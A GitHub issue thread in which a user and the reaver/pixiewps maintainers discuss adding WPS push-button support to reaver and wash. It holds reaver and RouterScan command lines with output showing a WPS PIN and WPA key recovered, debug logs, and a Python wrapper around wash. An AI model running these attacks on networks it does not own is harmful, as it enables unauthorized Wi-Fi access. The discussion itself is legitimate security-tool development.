Update reaver and I believe you will see nack code is 0x000F see my comment

@feitoi Yeah just tested it , and it works Great
image
But Then what does the
-L, --ignore-locks Ignore locked state reported by the target AP Actually do currently ?

oh never mind 😅

image

I have Checked the Wi-Fi Protected Setup Specification And it's quite an interesting read , It has all the answers ... so about the AP setup locked
3

Reaver doesn't have to exit when it detects the setup is locked but maybe if it also detects the device password id set to PBC then it should try PBC too

Anyway This what caught my Eyes from the documentation

The AP informs Enrollees that the Selected Registrar is in PBC mode using Probe Response messages

The Enrollee performs this scan by sending out probe requests with a Device Password ID indicating that
the Enrollee is in PBC mode and receiving probe responses indicating a Selected Registrar with a PBC
Device Password ID.

When an AP receives a Selected Registrar and Device Password ID indicating PBC mode from a
Registrar, it MUST automatically remove this information and no longer include it in probe responses
after an interval of Walk Time has elapsed.

Before the Registrar’s button is pushed, the AP shall not advertise any active PBC state

Device Password ID : Indicate the method or identifies the specific password that the selected
Registrar intends to use. AP in PBC mode must indicate 0x0004 within two-minute Walk Time.

When in PBC mode, the
Registrar shall respond to PBC M1 messages with UUID-E values matching the UUID-E from the PBC
probe request message. The Registrar’s response is an M2 message denoting via the DevicePassword ID
attribute that it is in the active PBC state. Upon receiving the M2 message, the Enrollee engages that
Registrar with messages M3-M8, with both the Registrar and Enrollee using a value of ‘00000000’ for the
PBC Device Password (PIN).

Found it , Found where you got this from

When WPS button was pushed, the AP temporarily change the PIN to 00000000 and change lock flag to unlocked or not, if AP is not vulnerable to Pixie Dust attack then reaver will not work

Any way Which makes us make the conclusion That

is:
"wps_selected_registrar" : 01 does not mean all routers are in PBC mode, some routers also have "wps_selected_registrar" : 01 in PIN mode, and these routers

Shouldn't happen and i also found this in another WPS documentation titled : Wireless LAN PCI Card User Manual V1.1

Device Password ID : Indicate the method or identifies the specific password that the selected
Registrar intends to use. AP in PBC mode must indicate 0x0004 within two-minute Walk Time.

Which means that the only way to actually make sure that the button was pushed is to check Device Password ID value

Images from the first documentation
2
1

I have just Tested the OneShot PBC option it works great But it ignores the entered mac address and it doesn't allow specifying a channel

image

rofl0r added a commit to t6x/reaver-wps-fork-t6x that referenced this issue Jan 25, 2022
this field seems to only be set when the WPS button was pushed.
ref: wiire-a/pixiewps#107
rofl0r added a commit to t6x/reaver-wps-fork-t6x that referenced this issue Jan 25, 2022
this field, if present, and having the value 0x0004 indicates that
the push button method was activated.
ref: wiire-a/pixiewps#107
@rofl0r
Copy link
Collaborator

rofl0r commented Jan 25, 2022

meanwhile i added a couple commits that make wash add the fields the wpspy script showed, but wash not. additionally, -j mode now detects when the WPS configuration of an already printed AP changes, and prints another line (that should make it possible to remove the timeout hack to use wash to detect when button was used).

edit: what's still missing is that reaver detects when the libwps_data struct contains the device_password_id == 4 condition (push button pressed) and in that case uses pin 00000000.

@minanagehsalalma
Copy link
Author

minanagehsalalma commented Jan 25, 2022

meanwhile i added a couple commits that make wash add the fields the wpspy script showed, but wash not.

@rofl0r Just tested it works just Great! , I updated the answer on unix.stackexchange too
image

additionally, -j mode now detects when the WPS configuration of an already printed AP changes, and prints another line (that should make it possible to remove the timeout hack to use wash to detect when button was used).

Ohhh , Tested it. This really awesome

But i still can't get it to echo found unless i kill it if i don't use the timeout command

wash -i wlan0mon -j -b XX:XX:B3:XX:7B:XX -c 3 | grep -q "wps_device_password_id" && echo Found || echo NotFound

only prints Found/not found

If i kill it.

edit: what's still missing is that reaver detects when the libwps_data struct contains the device_password_id == 4 condition (push button pressed) and in that case uses pin 00000000.

There is one tiny problem in this, And it's
image
Even that WPS PBC Still works just fine with the WPS status set to locked, Reaver won't work in that case .... and that would be misleading ... as for Why would it check for the lock when it doesn't matter nor it's needed in WPS PBC case ?

Great work mate

@rofl0r
Copy link
Collaborator

rofl0r commented Jan 25, 2022

But i still can't get it to echo found unless i kill it if i don't use the timeout command

you'd need to start wash via some wrapper (e.g. a python script) that terminates the wash process as soon as the desired string is found in the output.

Even that WPS PBC Still works just find with the WPS status set to locked, Reaver won't work in that case ....

i'd assume the reaver option -L, --ignore-locks Ignore locked state reported by the target AP should make it possible even in that case.

Why would it check for the lock when it doesn't matter nor it's needed in WPS PBC case ?

as i said in the beginning, nobody investigated PBC use case for reaver so far, as the likelihood of somebody pushing the button while you're scanning or running a bruteforce on it seems like winning the lottery.

edit: btw, it's odd that your pcap with pbc on has only a single beacon in it. it would be interesting to see whether beacons after PBC is activated have different content (like including the WPS tags)

@minanagehsalalma
Copy link
Author

i'd assume the reaver option -L, --ignore-locks Ignore locked state reported by the target AP should make it possible even in that case.

@rofl0r But i have already tested it earlier with the -L while the button is pushed and status is locked
and it still didn't work

image But Then what does the -L, --ignore-locks Ignore locked state reported by the target AP Actually do currently ?

oh never mind 😅

image

you'd need to start wash via some wrapper (e.g. a python script) that terminates the wash process as soon as the desired string is found in the output.

For some reason i can't still figure it out haha, echo not found shouldn't be even be an option
image

@minanagehsalalma
Copy link
Author

edit: btw, it's odd that your pcap with pbc on has only a single beacon in it. it would be interesting to see whether beacons after PBC is activated have different content (like including the WPS tags)

I don't understand ... I have posted a lot of images comparing the output of different tools PBC off vs PBC on

additionally, -j mode now detects when the WPS configuration of an already printed AP changes, and prints another line

It doesn't get affect by the "rssi" right ?

@feitoi
Copy link

feitoi commented Jan 25, 2022

But i have already tested it earlier with the -L while the button is pushed and status is locked and it still didn't work

as i said in the beginning, nobody investigated PBC use case for reaver so far

As @rofl0r says, reaver doesn't have a PBC implementation yet and because of that, the AP must have the lock flag unlocked.

edit: what's still missing is that reaver detects when the libwps_data struct contains the device_password_id == 4 condition (push button pressed) and in that case uses pin 00000000.

@minanagehsalalma, when WPS button was pushed, you should use -p 00000000 to get the password and not with -p 12345670
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 3 -vvLN -p 0000000

I don't understand ... I have posted a lot of images comparing the output of different tools PBC off vs PBC on

I think you missed to do WPS authentication while capturing with wireshark.

@feitoi
Copy link

feitoi commented Jan 25, 2022

But i have already tested it earlier with the -L while the button is pushed and status is locked and it still didn't work

Try to reboot your router, after reboot it may be that WPS lock flag goes back to unlocked and then press PBC button

@minanagehsalalma
Copy link
Author

@minanagehsalalma, when WPS button was pushed, you should use -p 00000000 to get the password and not with -p 12345670
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 3 -vvLN -p 0000000

@feitoi Yeah just tested it, Without the button pushed :

reaver -i wlan0mon -c 3 -b EX:3X:B3:X0:7B:21 -vvLN -p 00000000 

[+] Switching wlan0mon to channel 3
[+] Waiting for beacon from EX:3X:B3:X0:7B:21
[+] Received beacon from EX:3X:B3:X0:7B:21
[+] Vendor: RalinkTe
[+] Trying pin "00000000"
[+] Sending authentication request
[+] Sending association request
[+] Associated with EX:3X:B3:X0:7B:21 (ESSID: AAAAAAAAAA)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK (reason: 0x0012)
[+] Sending WSC NACK
[+] Quitting after 1 crack attempts
[-] Failed to recover WPA key

With the button pushed :

reaver -i wlan0mon -c 3 -b EX:3X:B3:X0:7B:21 -vvLN -p 00000000 

[+] Switching wlan0mon to channel 3
[?] Restore previous session for EX:3X:B3:X0:7B:21? [n/Y] n
[+] Waiting for beacon from EX:3X:B3:X0:7B:21
[+] Received beacon from EX:3X:B3:X0:7B:21
[+] Vendor: RalinkTe
[+] Trying pin "00000000"
[+] Sending authentication request
[+] Sending association request
[+] Associated with EX:3X:B3:X0:7B:21 (ESSID: AAAAAAAA)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 4 seconds
[+] WPS PIN: '00000000'
[+] WPA PSK: 'XXXXXXXXX'
[+] AP SSID: 'AAAAAAAA '

But I still don't understand why it fails when the WPS locked Even when using -L flag and -p 00000000 while the button is pushed ? It should ignore the lock then use that Pin to connect , But why it doesn't do that ?

i'd assume the reaver option -L, --ignore-locks Ignore locked state reported by the target AP should make it possible even in that case.

@rofl0r As you see i tested it again and it doesn't work.

I think you missed to do WPS authentication while capturing with wireshark.

hmm i didn't think that was needed.

@minanagehsalalma
Copy link
Author

As @rofl0r says, reaver doesn't have a PBC implementation yet and because of that, the AP must have the lock flag unlocked.

@feitoi oh now i get it .... so it still does it the PIN method even when PBC is pushed haha that's funny.

@rofl0r
Copy link
Collaborator

rofl0r commented Jan 25, 2022

that -L not works is probably due to the other errors that cause a WSC NACK to be sent in the first place (you'd see it with -vvvv).

For some reason i can't still figure it out haha, echo not found shouldn't be even be an option

the issue is that wash process keeps running.

here's a wrapper that you can use

import subprocess, sys
argv = list(sys.argv)
argv[0] = '../src/wash'
proc = subprocess.Popen(argv, executable=argv[0], stdout=subprocess.PIPE)
while 1:
        line = proc.stdout.readline()
        if line == '': break
        print line
        if '"wps_device_password_id" : "0004"' in line:
                print "WPS PBC enabled"
                proc.terminate()
                break

just replace ../wash with the path to wash and run it like python2 washwrap.py -j -f with\ pbc.cap

@minanagehsalalma
Copy link
Author

that -L not works is probably due to the other errors that cause a WSC NACK to be sent in the first place (you'd see it with -vvvv).

WPS:  * Device Password ID (4)
WPS:  * OS Version
WPS:  * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=66 op_code=3)
WPS: Received WSC_NACK
WPS: Unsupported attribute type 0x1049 len=6
WPS: Enrollee terminated negotiation with Configuration Error 15
[+] Received WSC NACK (reason: 0x000F)
[!] WARNING: Detected AP has WPS setup locked!
WPS: Building Message WSC_NACK
WPS:  * Version
WPS:  * Message Type (14)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
[!] WPS transaction failed (code: 0x04), re-trying last pin
WPS: Invalidating used wildcard PIN
WPS: Invalidated PIN for UUID - hexdump(len=16): bc 32 9e 00 1d d8 11 b2 86 01 ec 3e b3 40 7b 22
[+] Quitting after 0 crack attempts
[-] Failed to recover WPA key
[+] Nothing done, nothing to save.

Are sure it's not cause Reaver use the Pin method while the router is using PBC ?
as feitoi said

reaver doesn't have a PBC implementation yet and because of that, the AP must have the lock flag unlocked.

just replace ../wash with the path to wash and run it like python2 washwrap.py -j -f with\ pbc.cap

@rofl0r Huh ? why read or write to a file ?
Can't it be done on the live ..... I don't get how to use it .

@rofl0r
Copy link
Collaborator

rofl0r commented Jan 26, 2022

WPS: * Device Password ID (4)

the interesting stuff comes before that.

Are sure it's not cause Reaver use the Pin method while the router is using PBC ?

no, i'm not. i didnt study how PBC works and am of the impression it works identical to pin mode except pin "00000000" needs to be sent. but maybe there's more to it.

just replace ../wash with the path to wash and run it like python2 washwrap.py -j -f with\ pbc.cap

@rofl0r Huh ? why read or write to a file ?

what read or write ? this script starts wash as a controlled subprocess and terminates it as soon as the line with the PBC indicator is received.

Can't it be done on the live ..... I don't get how to use it .

save the script as washwrapper.py and run it instead of wash with all arguments you'd usually pass to wash. like python2 washwrapper.py -j -i wlan0mon -c 6. i can't see anything difficult about it. you only got to modify the path to the wash binary instead of "../src/wash"

@minanagehsalalma
Copy link
Author

the interesting stuff comes before that.

@rofl0r Here it's

WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     30 30 30 30 30 30 30 30                           00000000        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "00000000"
send_packet called from deauthenticate() 80211.c:380
send_packet called from authenticate() 80211.c:411
[+] Sending authentication request
send_packet called from associate() 80211.c:464
[+] Sending association request
[+] Associated with EX:3X:B3:X0:7B:21 (ESSID: AAAAAA)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=396 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): bc 32 9e 00 1d d8 11 b2 86 01 ec 3e b3 40 7b 22
WPS: Enrollee MAC Address EX:3X:B3:X0:7B:21
WPS: Enrollee Nonce - hexdump(len=16): da 6b f2 5f e4 56 ef 85 ea 45 fb ca 2b ca 06 e2
WPS: Enrollee Authentication Type flags 0x21
WPS: No match in supported authentication types (own 0x0 Enrollee 0x21)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0x9
WPS: No match in supported encryption types (own 0x0 Enrollee 0x9)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x238c [Label] [Display] [PBC] [Keypad]
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=5):
     5a 79 78 65 6c                                    TTTT           
WPS: Model Name - hexdump_ascii(len=12):
     56 4d 47 33 36 32 35 2d 54 35 30 42               TTTT-TTTB    
WPS: Model Number - hexdump_ascii(len=6):
     52 54 32 38 36 30                                 RT2860          
WPS: Serial Number - hexdump_ascii(len=4):
     31 32 33 34                                       1234            
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=12):
     56 4d 47 33 36 32 35 2d 54 35 30 42               TTTT-TTTB    
WPS: Enrollee RF Bands 0x1
WPS: Enrollee Association State 0
WPS: Device Password ID 4
WPS: Enrollee Configuration Error 0
WPS: OS Version 80000000
WPS: M1 Processed
WPS: Unsupported Device Password ID 4
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): 5c 92 2e 94 3b b5 4a 75 93 0b 28 b8 5e 1b 8b fa
WPS: UUID-R - hexdump(len=16): 79 69 24 bb bd 1d 37 c0 04 70 f6 97 6b e5 e7 41
WPS: Building Message M2
WPS:  * Version
WPS:  * Message Type (5)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * UUID-R
WPS:  * Public Key
WPS: Generate new DH keys
DH: private value - hexdump(len=192): 31 0f 57 03 7f a2 ed 11 66 cb 64 aa 08 be fa 79 e0 f5 fe 3a 85 16 85 0a c7 c1 df dd 33 55 b3 96 6d af 6f dc d0 8f 00 3b c9 70 1e c6 e1 6f cd 36 10 aa 60 19 d8 fa f3 ec 5b ae 14 8d 73 dd 29 0f 8c 24 3f 07 75 c3 44 f9 b8 e4 f8 19 78 f2 f5 78 67 f6 12 c8 85 e3 ba 27 ae ce 90 5a be 8e 4f c8 77 b6 61 54 56 8d 7c c3 69 f3 c9 bf b7 fb 49 ed 55 60 db e9 ba 4e 05 1f d8 bc 43 9d 63 d4 33 98 eb d8 e0 c1 9d af 26 6d 58 0f f7 bb c8 ac bb fd 9f 3a e4 c8 8e 6a 5a ed 00 6c ac f6 b7 63 1f bf ae e4 ed c8 34 64 a0 6b ab df 5e 68 1c e0 fe 76 67 6f 12 32 87 4c 82 18 a4 46 d7 17 93 55 a6 4f
DH: public value - hexdump(len=192): a6 73 a9 61 44 83 32 58 28 78 47 0c 48 c5 00 6d 3c d6 3d ab 22 f1 2f f0 78 9f e3 60 3e 3e 9c 97 d5 ef 06 87 6b 9e 07 09 a5 85 ad 28 fa 2b b8 f3 48 d3 b3 33 a5 54 92 7f c5 88 ae 77 0e 06 a2 1a 87 62 da 61 be f1 22 f1 34 c3 78 96 07 38 7f ad de ed 31 59 c8 2e 7f 80 4d ed 51 2d 3d ef fe 65 04 9a b9 32 13 cd 67 fc 2a 5c c1 4d 30 7b 40 bc 93 69 81 b5 6f 32 30 47 18 17 da 65 bc 8f 01 2a fd ac cf 92 de c1 f5 6b 18 7c bf 61 4c 59 3f 7c 40 a1 c8 e6 dc d1 61 20 4f a9 e4 69 44 eb 27 a2 ed ff 5f a0 75 29 59 c0 bf 7c 6e 10 ea 1c 7a 0f 9e 1b 26 7d 80 e6 f0 3b 6e 3f 1e d1 b8 bb f5 04
WPS: DH Private Key - hexdump(len=192): 31 0f 57 03 7f a2 ed 11 66 cb 64 aa 08 be fa 79 e0 f5 fe 3a 85 16 85 0a c7 c1 df dd 33 55 b3 96 6d af 6f dc d0 8f 00 3b c9 70 1e c6 e1 6f cd 36 10 aa 60 19 d8 fa f3 ec 5b ae 14 8d 73 dd 29 0f 8c 24 3f 07 75 c3 44 f9 b8 e4 f8 19 78 f2 f5 78 67 f6 12 c8 85 e3 ba 27 ae ce 90 5a be 8e 4f c8 77 b6 61 54 56 8d 7c c3 69 f3 c9 bf b7 fb 49 ed 55 60 db e9 ba 4e 05 1f d8 bc 43 9d 63 d4 33 98 eb d8 e0 c1 9d af 26 6d 58 0f f7 bb c8 ac bb fd 9f 3a e4 c8 8e 6a 5a ed 00 6c ac f6 b7 63 1f bf ae e4 ed c8 34 64 a0 6b ab df 5e 68 1c e0 fe 76 67 6f 12 32 87 4c 82 18 a4 46 d7 17 93 55 a6 4f
WPS: DH own Public Key - hexdump(len=192): a6 73 a9 61 44 83 32 58 28 78 47 0c 48 c5 00 6d 3c d6 3d ab 22 f1 2f f0 78 9f e3 60 3e 3e 9c 97 d5 ef 06 87 6b 9e 07 09 a5 85 ad 28 fa 2b b8 f3 48 d3 b3 33 a5 54 92 7f c5 88 ae 77 0e 06 a2 1a 87 62 da 61 be f1 22 f1 34 c3 78 96 07 38 7f ad de ed 31 59 c8 2e 7f 80 4d ed 51 2d 3d ef fe 65 04 9a b9 32 13 cd 67 fc 2a 5c c1 4d 30 7b 40 bc 93 69 81 b5 6f 32 30 47 18 17 da 65 bc 8f 01 2a fd ac cf 92 de c1 f5 6b 18 7c bf 61 4c 59 3f 7c 40 a1 c8 e6 dc d1 61 20 4f a9 e4 69 44 eb 27 a2 ed ff 5f a0 75 29 59 c0 bf 7c 6e 10 ea 1c 7a 0f 9e 1b 26 7d 80 e6 f0 3b 6e 3f 1e d1 b8 bb f5 04
WPS: DH Private Key - hexdump(len=192): 31 0f 57 03 7f a2 ed 11 66 cb 64 aa 08 be fa 79 e0 f5 fe 3a 85 16 85 0a c7 c1 df dd 33 55 b3 96 6d af 6f dc d0 8f 00 3b c9 70 1e c6 e1 6f cd 36 10 aa 60 19 d8 fa f3 ec 5b ae 14 8d 73 dd 29 0f 8c 24 3f 07 75 c3 44 f9 b8 e4 f8 19 78 f2 f5 78 67 f6 12 c8 85 e3 ba 27 ae ce 90 5a be 8e 4f c8 77 b6 61 54 56 8d 7c c3 69 f3 c9 bf b7 fb 49 ed 55 60 db e9 ba 4e 05 1f d8 bc 43 9d 63 d4 33 98 eb d8 e0 c1 9d af 26 6d 58 0f f7 bb c8 ac bb fd 9f 3a e4 c8 8e 6a 5a ed 00 6c ac f6 b7 63 1f bf ae e4 ed c8 34 64 a0 6b ab df 5e 68 1c e0 fe 76 67 6f 12 32 87 4c 82 18 a4 46 d7 17 93 55 a6 4f
WPS: DH peer Public Key - hexdump(len=192): f7 28 68 51 bc 3c e1 9f 37 ac 32 b3 01 dd 5b 18 db 40 62 4c 3a a3 0b 83 fc 20 15 f5 b4 93 37 e0 6d f4 d8 03 46 8f c4 2a 74 e5 ec 81 a9 ad 09 48 72 3d aa 0a b4 54 73 4f 95 f8 15 35 13 3c b3 e4 fb 37 91 cf 36 11 b9 45 70 0f 2b 67 58 c0 eb f5 86 9d 15 61 a9 96 f1 4a 95 a2 05 e3 fd 06 55 64 57 a8 74 8b fd 76 8e a9 ff 81 b2 ed 13 6f 7f 33 ae 7c 25 86 cf 0e 6c df 17 79 7b 93 0c 46 61 e6 28 83 ad 0b 7c 92 e3 02 cd cb 68 6c 7b 56 f0 df 8e 97 06 05 ea be 53 b1 9d e6 e3 af 84 23 87 9d 12 fe c7 07 de 44 67 bc 72 88 da c8 30 89 19 0b 88 e0 c6 cd bd 53 42 41 38 8f f4 1f eb 3e 48 00
DH: shared key - hexdump(len=192): 3b 14 f9 6e 52 8f b6 f9 2a 47 c4 64 95 2c 2f d6 07 b7 b2 66 bd f8 6d 4f d1 48 9b d2 76 34 e3 46 cf bd fc 4a ae d7 e3 63 6b dd ed 64 58 92 7a 71 95 01 75 77 53 d1 5d cb fb 19 4f 8d 23 dc 8e 11 8b 5c 00 12 d1 26 65 cc 6e 2e 96 f7 3a 0f 36 32 1b db d3 b6 21 2f 80 a7 86 bc cf dc b9 9b aa 19 a0 3a 21 14 ee 5b 72 e7 b5 00 00 00 a7 75 ee 83 3f c2 70 9a 62 0e 0f 8b 76 b8 dc b8 cd 0f 6e 5e 53 28 e5 f1 41 5e 90 65 da 30 0d ff a4 43 92 29 81 91 88 42 ed 75 ed ea 3a 00 37 9e 6f 35 15 9e e9 ae bf 65 d8 13 2a 67 2a 0f 96 b8 46 7e cf c3 3c ef ef 67 ac 68 45 df 8d c8 ee e2 dd 50 6d 9e
WPS: DH shared key - hexdump(len=192): 3b 14 f9 6e 52 8f b6 f9 2a 47 c4 64 95 2c 2f d6 07 b7 b2 66 bd f8 6d 4f d1 48 9b d2 76 34 e3 46 cf bd fc 4a ae d7 e3 63 6b dd ed 64 58 92 7a 71 95 01 75 77 53 d1 5d cb fb 19 4f 8d 23 dc 8e 11 8b 5c 00 12 d1 26 65 cc 6e 2e 96 f7 3a 0f 36 32 1b db d3 b6 21 2f 80 a7 86 bc cf dc b9 9b aa 19 a0 3a 21 14 ee 5b 72 e7 b5 00 00 00 a7 75 ee 83 3f c2 70 9a 62 0e 0f 8b 76 b8 dc b8 cd 0f 6e 5e 53 28 e5 f1 41 5e 90 65 da 30 0d ff a4 43 92 29 81 91 88 42 ed 75 ed ea 3a 00 37 9e 6f 35 15 9e e9 ae bf 65 d8 13 2a 67 2a 0f 96 b8 46 7e cf c3 3c ef ef 67 ac 68 45 df 8d c8 ee e2 dd 50 6d 9e
WPS: DHKey - hexdump(len=32): 6b c3 bb 6b 93 92 fe 02 e1 e7 6b e8 80 90 60 b7 e6 96 f3 51 df 53 e3 73 1c 94 f2 34 18 e2 5c 05
WPS: KDK - hexdump(len=32): fa ab e9 c0 c4 b4 e9 6b 52 1e 04 77 9f bf 45 c6 0f f1 e8 03 18 5f 50 a2 e4 66 f2 ec 9d 5a d2 72
WPS: AuthKey - hexdump(len=32): c9 59 f4 7a 86 dc 97 04 00 77 27 17 07 17 e0 56 85 b2 45 0a 3c 83 2d 00 86 73 a6 cb 3d 1c ce e7
WPS: KeyWrapKey - hexdump(len=16): 8c be 70 f5 39 84 3b 4f fb ba 4f 64 c9 16 2c 9b
WPS: EMSK - hexdump(len=32): 58 c6 9b 76 8b 8e 4d 1a c3 f8 11 00 e6 f4 8b 80 5e 6a 1e d9 41 97 98 ee 06 75 3e 3a 3c 2b b7 fa
WPS:  * Authentication Type Flags
WPS:  * Encryption Type Flags
WPS:  * Connection Type Flags
WPS:  * Config Methods (8c)
WPS:  * Manufacturer
WPS:  * Model Name
WPS:  * Model Number
WPS:  * Serial Number
WPS:  * Primary Device Type
WPS:  * Device Name
WPS:  * RF Bands (0)
WPS:  * Association State
WPS:  * Configuration Error (0)

what read or write ?

i was talking about the pbc.cap and -f you told me to run it with
python2 washwrap.py -j -f with\ pbc.cap

Yeah that worked great , Thanks a lot
python2 washwrapper.py -j -i wlan0mon -c 6.

you only got to modify the path to the wash binary instead of "../src/wash"

but why do i need to type the path ? i just typed wash with no pathes

i also changed the order of these two lines
image

@minanagehsalalma
Copy link
Author

@rofl0r I added the script to the unix.stackexchange answer too

image

@minanagehsalalma
Copy link
Author

Thanks Every one for your Help so far ...

I learned a lot and and figured a lot of things

That wasn't possible with searching

it wasn't possible without you ;)

The only thing missing is Reaver to ignore the AP has WPS setup locked when the WPS button is pushed & to work with -L -p 00000000 pin on PBC

@rofl0r
Copy link
Collaborator

rofl0r commented Jan 26, 2022

@minanagehsalalma if you can provide 2 pcaps:

  • reaver wps session against PBC-mode ap (failing)
  • wps session against PBC-mode ap (working) made with whatever tool, be it OneShot or routerscan

i can take a look at what would be needed on the reaver side to support it.

@minanagehsalalma
Copy link
Author

minanagehsalalma commented Jan 26, 2022

@rofl0r

ReaverPBCFailing
reaver -i wlan0mon -c 3 -b Mac -vvLN -p 00000000

The output is the same as always

And using router scan with the ignore lock flag

[*] Audit started at 2022.01.26 22:08:44 (UTC+02:00).
[*] Associating with AP...
[+] Associated with EX:3X:B3:X0:7B:21 (ESSID: ~XXXXXXX~).
[*] Warning: AP is locked.
[*] Waiting for pin "000000"...
[*] Sending EAPOL Start...
[*] Received Identity Request.
[*] Sending Identity Response...
[*] Received WPS Start.
[*] Sending WPS Message M1...
[*] Received WPS Message M2.
[*] Manufacturer: XXXX
[*] Model Name: XXXXX
[*] Model Number: XXXX
[*] Serial Number: XXX
[*] Device Name: XXXXXX
[*] Sending WPS Message M3...
[*] Received WPS Message M4.
[*] Sending WPS Message M5...
[*] Received WPS Message M6.
[*] Sending WPS Message M7...
[*] Received WPS Message M8.
[*] Sending WSC DONE...
[*] EAP session closed.
[+] WPS transaction succeeded!
[+] SSID: XXXXXXXXX
[+] Key: XXXXXXXXXXXX
[+] Key Index: 1
[*] Audit stopped at 2022.01.26 22:08:52 (UTC+02:00).

WPS PBC session Capture.zip

i can take a look at what would be needed on the reaver side to support it.

Thanks lot 😘

Also as a bonus can we get a quick view of extracting the values needed for -7, --m7-enc Aka the real title of the issue here and also the title of an earlier issue you posted
guide or tool to get -7 values from pcap

Here the
Display Filter Reference: Wifi Protected Setup for wireshark
again .. i still don't quite get how to extract them

Edit : Ah never mind , i just noticed that it only works for routers with Realtek RTL819x Chipset so.... and that's a really old one and even if anything uses it .... they have already patched a bug that allowed such attack

@rofl0r
Copy link
Collaborator

rofl0r commented Jan 26, 2022

The output is the same as always

yes, but i requested a pcap, not the output, in order to compare it with routerscan pcap.

again .. i still don't quite get how to extract them

there's an open ticket for that, #89 . feel free to create a wiki page to document the process if you find out.

@minanagehsalalma
Copy link
Author

yes, but i requested a pcap, not the output, in order to compare it with routerscan pcap.

well ... The zip file is right there

I posted the output just incase

@rofl0r so how is it going ?

there's an open ticket for that, #89 . feel free to create a wiki page to document the process if you find out.

I don't think it would be much of a use , as the bug is super old and exists in old devices only and it's already patched .. so ...

@minanagehsalalma
Copy link
Author

@rofl0r Look at this We were speaking about a way to go thro the Wpa_cli wps connect in monitor mode

And kcdtv mentioned that you are a member of the forum 😅

So you probably know what's up haha

He told me that wpa_cli wps_pbc is the only available way to do such a thing

So i think Reaver would be the first to provide an alternative

@minanagehsalalma
Copy link
Author

@rofl0r any news ?

@rofl0r
Copy link
Collaborator

rofl0r commented Feb 2, 2022

i've been busy with RL so i didn't have time to look into your PCAPs. hopefully next week.

@minanagehsalalma
Copy link
Author

i've been busy with RL so i didn't have time to look into your PCAPs. hopefully next week.

@rofl0r np , Thanks a lot mate

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

4 participants